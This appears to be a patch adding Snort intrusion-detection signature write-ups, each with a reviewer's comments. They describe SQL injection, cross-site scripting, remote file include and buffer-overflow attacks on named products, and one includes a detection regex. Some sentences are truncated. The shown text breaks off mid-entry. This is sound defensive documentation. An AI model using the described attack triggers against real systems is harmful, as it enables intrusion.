+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0236
+
+CERT
+http://www.cert.org/advisories/CA-2001-05.html
+
+Bugtraq
+http://www.securityfocus.com/bid/2417
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/2372.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+2372
+
+--
+Summary:
+This event is generated when an attempt is made to access showphoto.php, a 
+component of the Photopost PHP web application running on a server.
+
+--
+Impact:
+Unauthorized administrative access to the underlying database.
+
+--
+Detailed Information:
+Photopost is a PHP photo gallery application. It is possible for a
+remote attacker to perform SQL queries on the database used by Photopost
+that could disclose sensitive information or compromise the data stored
+on the server.
+
+--
+Affected Systems:
+	Photopost PHP Pro version 4.6 and earlier
+
+--
+Attack Scenarios:
+An attacker can manipulate the photo parameter in the script
+showphoto.php to perform SQL queries of their choosing.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <matthew.watchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
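Review bot: the Summary says only that showphoto.php was accessed, while Impact and Attack Scenarios describe SQL injection through the "photo" parameter; the Summary should say the rule matches an SQL injection attempt via that parameter, otherwise ordinary requests for the page look like the trigger. Additional References is empty even though Affected Systems cites a specific version range (4.6 and earlier), which implies a published advisory that should be listed.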
--- /dev/null
+++ b/doc/signatures/100000780.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000780
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Horde" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "name" parameter in the "problem.php" script used by the "Horde" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Horde
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Dan Raswami <dan.raswami@sourcefire.com>
+
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
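Review bot: the Impact text ("system integrity compromise", "execution of arbitrary code") is the generic CGI boilerplate and overstates a cross site scripting issue in the "name" parameter of "problem.php"; the realistic impact is script execution in the victim's browser, session or credential theft and content spoofing, which is what the Attack Scenarios paragraph actually describes. Suggest rewording Impact to match, and adding the missing blank line before "--" after the Sid and after Affected Systems.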
--- /dev/null
+++ b/doc/signatures/2381.txt
@@ -0,0 +1,65 @@
+Rule:  
+
+--
+Sid:
+2381
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Checkpoint Firewall-1
+
+--
+Impact:
+Serious. Unauthorized administrative access to the firewall
+
+--
+Detailed Information:
+A vulnerability exists in Checkpoint Firewall-1 that may allow a remote
+attacker to gain control of the firewall. The issues lies in the
+handling of HTTP requests by the Security Server and Application
+Intelligence modules of the Firewall's administration console.
+
+By supplying a malformed scheme in a URI an attacker may present the
+attacker with the opportunity to send data of their choosing to the
+sprintf() system call.
+
+--
+Affected Systems:
+	Checkpoint Firewall-1
+	
+--
+Attack Scenarios:
+An attacker must supply specially crafted packets containing malformed
+URI schema with the data they wish to send to the sprintf() function.
+This may then present the attacker with administrative privileges on the
+server.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Disallow external access to the Firewall-1 administrative interface.
+
+Disable the Web interface to the firewall if possible
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
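Review bot: "sprintf() system call" in Detailed Information is wrong: sprintf() is a C library function, not a system call, and "an attacker may present the attacker with the opportunity" should read "a malformed scheme in a URI may present the attacker with the opportunity". Typos: "The issues lies" should be "The issue lies"; "malformed URI schema" in Attack Scenarios should be "malformed URI scheme". Full stops are missing after "Checkpoint Firewall-1" in the Summary, after "the firewall" in Impact and after "if possible" in Corrective Action. Additional References is empty.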
--- /dev/null
+++ b/doc/signatures/122-11.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-11
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically an ip
+protocol sweep was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
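Review bot: the Summary identifies this as an IP protocol sweep, but Detailed Information and Attack Scenarios only describe port scanning in general and never say how a protocol sweep differs (probing which IP protocols a host accepts rather than which ports are open), so the reader cannot tell why this alert is distinct from the other 122-* entries. Typos: "reconnaisance" should be "reconnaissance", "consititute" should be "constitute". "Apply any appropriate vendor supplied patches as appropriate" in Corrective Action repeats itself.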
--- /dev/null
+++ b/doc/signatures/636.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+636
+
+--
+Summary:
+This event is generated when a scan is detected. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to scan a host.
+
+This may be the prelude to an attack. Scanners are used to ascertain 
+which ports a host may be listening on, whether or not the ports are 
+filtered by a firewall and if the host is vulnerable to a particular 
+exploit.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+An attacker can determine if ports 21 and 20 are being used for FTP. 
+Then the attacker might find out that the FTP service is vulnerable to a
+particular attack and is then able to compromise the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A scanner may be used in a security audit.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Determine whether or not the scan was legitimate then look for other 
+events concerning the attacking IP address.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
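Review bot: the Summary ("when a scan is detected") and Detailed Information do not say what this rule matches, so SID 636 cannot be told apart from the other scan entries in this patch; state the scanner or packet pattern the rule keys on. The Attack Scenarios example about ports 20 and 21 is unrelated to the rule unless it actually detects an FTP port probe. Additional References is empty.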
--- /dev/null
+++ b/doc/signatures/2587.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2587
+
+--
+Summary:
+This event is generated when activity by Peer-to-Peer (p2p) clients is detected.
+
+--
+Impact:
+Informational event. Unauthorized use of a p2p client may be in progress.
+
+--
+Detailed Information:
+This event indicates that use of a p2p client has been detected. 
+This may be against corporate policy. p2p clients connect to other p2p 
+clients to share files, commonly music and video files but can be configured 
+to share any file on the local machine. In particular this event is
+generated when the p2p client eDonkey is used.
+
+This activity may not only use bandwidth but may also be used to transfer 
+company confidential information to unauthorized hosts external to the 
+protected network bypassing other security measures in place.
+
+--
+Affected Systems:
+Any host using an eDonkey p2p client.
+
+--
+Attack Scenarios:
+This is indicative of the use of a p2p client.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Check the host and uninstall any p2p client found.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2411.txt
@@ -0,0 +1,66 @@
+Rule:  
+
+--
+Sid:
+2411
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in RealNetworks Helix Media Server.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+Versions of RealNetworks Helix Media Server and RealSystem Server are
+vulnerable to a buffer overflow condition that may present the attacker
+with the opportunity to execute code of their choosing on the target
+system.
+
+This may then present the attacker with the opportunity to gain a remote
+root shell, thus compromising the system.
+
+--
+Affected Systems:
+	 Helix Universal Server 9.01, versions 9.0.2.794 and earlier
+	  RealSystem Server 8.0 & 7.0
+
+--
+Attack Scenarios:
+The attacker may probe for the existence of an affected server and then
+use one of the publicly available scripts to exploit the service.
+
+--
+Ease of Attack:
+Simple. Exploits exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+RealNetworks
+http://www.service.real.com/help/faq/security/rootexploit091103.html
+
+--
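Review bot: typo in Ease of Attack: "Exploits exists" should be "Exploits exist". The Affected Systems entries are indented inconsistently (a tab plus one and two spaces), and "Helix Universal Server 9.01, versions 9.0.2.794 and earlier" mixes two version formats; use the product and version strings from the RealNetworks advisory already cited under Additional References.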
--- /dev/null
+++ b/doc/signatures/100000589.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000589
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "db_import.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "db_import.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
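Review bot: same template problem as the other remote file include entries in this patch: the third Detailed Information paragraph and the Attack Scenarios section describe credential checking, not the "admin_template_path" include in "db_import.php", and "running ona web server" needs a space. The blank line before "--" is missing after the Sid and after Affected Systems, unlike the rest of the file.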
--- /dev/null
+++ b/doc/signatures/2034.txt
@@ -0,0 +1,85 @@
+Rule:
+
+--
+Sid:
+2034
+
+--
+Summary:
+A request has been made to rpc.ypserv from an external source that 
+should not have access to this service. This may be indicative of an 
+intelligence gathering activity as a prelude to a more serious 
+compromise of system resources.
+
+service against the target host.
+
+--
+Impact:
+Disclosure of sensitive system information to an unauthorized user. 
+Possible denial of service.
+
+--
+Detailed Information:
+The rpc.ypserv daemon queries information in the local NIS maps. A 
+response to this query may divulge important information to the user 
+performing the query. This could lead to futher exploitation of 
+resources on the network.
+
+In addition, a vulnerability exists in ypserv on some Linux platforms 
+that could lead to a buffer overflow and root compromise of the target 
+host. This is achieved by making a multitude of requests for a NIS map 
+that does not exist.
+
+--
+Affected Systems:
+Multiple systems running versions of ypserv prior to 2.5.
+
+--
+Attack Scenarios:
+The attacker can craft a malicious request to rpc.ypserv such that 
+valuable information can be returned to the attacker.
+
+In the case of a buffer overflow, the attacker might issue a large 
+therefore, be seen many times.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+Upgrade ypserv to the latest version.
+
+Use /var/yp/securenets to list the hosts allowed to access this resource
+where appropriate.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/6016
+http://www.securityfocus.com/bid/5914
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1232
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1043
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1042
+
+--
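Review bot: two sentences are truncated in this file. In the Summary, "service against the target host." is an orphan fragment after a blank line that attaches to nothing; in Attack Scenarios, "the attacker might issue a large" breaks off and is followed by "therefore, be seen many times.", so the middle of the sentence (presumably the repeated requests for a non-existent NIS map that Detailed Information mentions) is missing. The original wording needs restoring before this ships. Typo in Detailed Information: "futher" should be "further".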
--- /dev/null
+++ b/doc/signatures/1689.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1689
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
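Review bot: the sentence "This connection can either be a legitimate telnet connection or the result of spawning a remote shell" does not belong in an Oracle rule description and looks copied from a telnet entry; drop it. Attack Scenarios opens with "Simple.", which is an Ease of Attack value, not a scenario. The False Negatives section is tuning guidance about $ORACLE_PORTS and duplicates the paragraph already in Detailed Information; keep one copy and reduce False Negatives to "None known" with a pointer to it. Also "Sid: 1689" is on one line where every other file puts the number on its own line.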
--- /dev/null
+++ b/doc/signatures/2307.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+2307
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PayPal Storefront PHP web application running on a server.
+
+--
+Impact:
+Possible execution of arbitrary code of the attackers choosing.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PayPal Storefront PHP web application running 
+on a server. It may be possible for an attacker to include code of their
+choosing from a source external to the server running the application.
+This code will execute with the privileges of the user running the web
+server.
+
+The vulnerability exists due to inadequate verification of include file
+locations in the application.
+
+--
+Affected Systems:
+	PayPal Store Front 3.0, others may also be affected.
+
+--
+Attack Scenarios:
+An attacker might include their code by including the URI to the script
+in the HTTP GET parameters when calling index.php.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+The content/pcre criteria: "content:"page="; pcre:"/page=(http|https|ftp)/i"; 
+Are met frequently by the strings "page=http" and "lastpage=http" which 
+occur relatively often in the text of cookies, most commonly ones associated 
+with MSN passport.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+False positive information contributed by Alan Whinery <whinery@hawaii.edu>
+
+--
+Additional References:
+
+--
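Review bot: the False Positives section quotes the rule options with mismatched quotes: "content:"page="; pcre:"/page=(http|https|ftp)/i"; opens a double quote before content: that is never closed, and the next line starts mid-sentence with a capitalised "Are". Quote the options as they appear in the rule (content:"page="; pcre:"/page=(http|https|ftp)/i";) and join the two lines into one sentence. Since the section already explains the cookie collision, a one-line tuning suggestion (restrict the match to the request URI rather than anywhere in the request) would make it actionable.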
--- /dev/null
+++ b/doc/signatures/2694.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2694
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure verify_queue_types_get_nrp
+. This procedure is included in
+sys.dbms_aqadm.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
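Review bot: the procedure name in Detailed Information is broken across two lines with the sentence's full stop left on its own ("vulnerability in the procedure verify_queue_types_get_nrp" followed by a line containing only "."), and Affected Systems reads "Oracle Oracle9i"; join the name and period onto one line and drop the duplicated word. Additional References is empty even though the text calls this a known vulnerability in sys.dbms_aqadm, so the vendor advisory or CVE the rule was written from should be cited so the Oracle9i-only claim in Affected Systems can be checked.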
--- /dev/null
+++ b/doc/signatures/2632.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2632
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "refresh_mview_repgroup" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gowner" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck90.html
+
+--
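Review bot: Ease of Attack says only "Simple." while Attack Scenarios states that the attack "requires an attacker to logon to the database with a valid username and password combination"; the authentication prerequisite should be repeated in Ease of Attack (for example "Simple, but a valid database login is required"), since it changes how an analyst triages the event. Also "a Oracle database implementation" in Summary should read "an Oracle database implementation", and the sentence about setting $ORACLE_PORTS to "any" describes a Snort variable rather than the vulnerability, so it belongs in a deployment note rather than in Detailed Information.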
--- /dev/null
+++ b/doc/signatures/3458.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+3458
+
+--
+Summary:
+This event is generated when an attempt is made to exploit
+a buffer overflow associated with the Arkeia Client Backup
+server.
+
+--
+Impact:
+A successful attack may cause a buffer overflow and the
+subsequent execution of arbitrary code at the privilege
+level of the vulnerable service.
+
+--
+Detailed Information:
+A vulnerability exists in the Arkeia Client Backup server
+software for a type 84 request. This may cause a buffer
+overflow and the subsequent execution of arbitrary code
+on a vulnerable server. The vulnerability is caused by
+an overly long message length.
+
+--
+Affected Systems:
+	Arkeia version 5.3 and prior.
+
+--
+Attack Scenarios:
+An attacker craft a malicious type 84 request and send
+it to a vulnerable server.
+
+--
+Ease of Attack:
+Simple.  Exploits are publicly available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+There can be multiple messages in one transfer. The event is generated
+on the first message only.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Metasploit:
+http://metasploit.com/research/arkeia_agent
+
+--
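Review bot: Attack Scenarios has a grammatical error ("An attacker craft a malicious type 84 request and send it") and should read "An attacker crafts a malicious type 84 request and sends it"; the "Additional References" header is also missing the colon every other file uses. The False Negatives observation (a transfer may carry several messages and only the first is inspected) is the most useful line in the file and would be worth repeating in Detailed Information next to the description of the type 84 request.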
--- /dev/null
+++ b/doc/signatures/1538.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1538
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Cassandra NNTP server.
+
+--
+Impact:
+Denial of Service (DoS) 
+
+--
+Detailed Information:
+A vulnerability exists in the Cassandra NNTP server for Windows such
+that an unusually long login name will cause a DoS condition to occur.
+This is due to an unchecked buffer in the code that handles login
+attempts. A login name that exceeds 10 000 characters will trigger the
+overflow.
+
+--
+Affected Systems:
+	Atrium Software Cassandra NNTP Server 1.10
+
+--
+Attack Scenarios:
+An attacker needs to supply a login username containing 10 000 or more
+characters to cause the DoS.
+
+--
+Ease of Attack:
+Simple. No exploit software is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1156
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0341
+
+--
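Review bot: Impact lists only "Denial of Service (DoS)" while Detailed Information blames "an unchecked buffer in the code that handles login attempts" and says the long name "will trigger the overflow"; an unchecked-buffer overflow normally carries at least the possibility of code execution, so either Impact should mention that possibility or Detailed Information should say explicitly that only a crash has been demonstrated. The two statements of the threshold also disagree at the boundary ("exceeds 10 000 characters" versus "10 000 or more characters"); pick one.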
--- /dev/null
+++ b/doc/signatures/949.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+949
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
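Review bot: Detailed Information and Attack Scenarios never identify which FrontPage Server Extensions request the rule matches ("Many known vulnerabilities exist for this platform and the attack scenarios are legion"), so an analyst receiving this event cannot tell what traffic triggered it or which advisory applies; name the matched URI or component, and fill in Additional References, which is empty.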
--- /dev/null
+++ b/doc/signatures/1131.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1131
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
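Review bot: the whole body is the generic web-server template ("All systems using a web server", "attack scenarios are legion") and contains nothing specific to sid 1131, so the document gives an analyst no way to tell which request the rule matched; Summary and Detailed Information should name the matched URI or application. Minor: "running a Web server or a vulnerable application on a web server" capitalises "Web" inconsistently within one sentence.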
--- /dev/null
+++ b/doc/signatures/1221.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1221
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
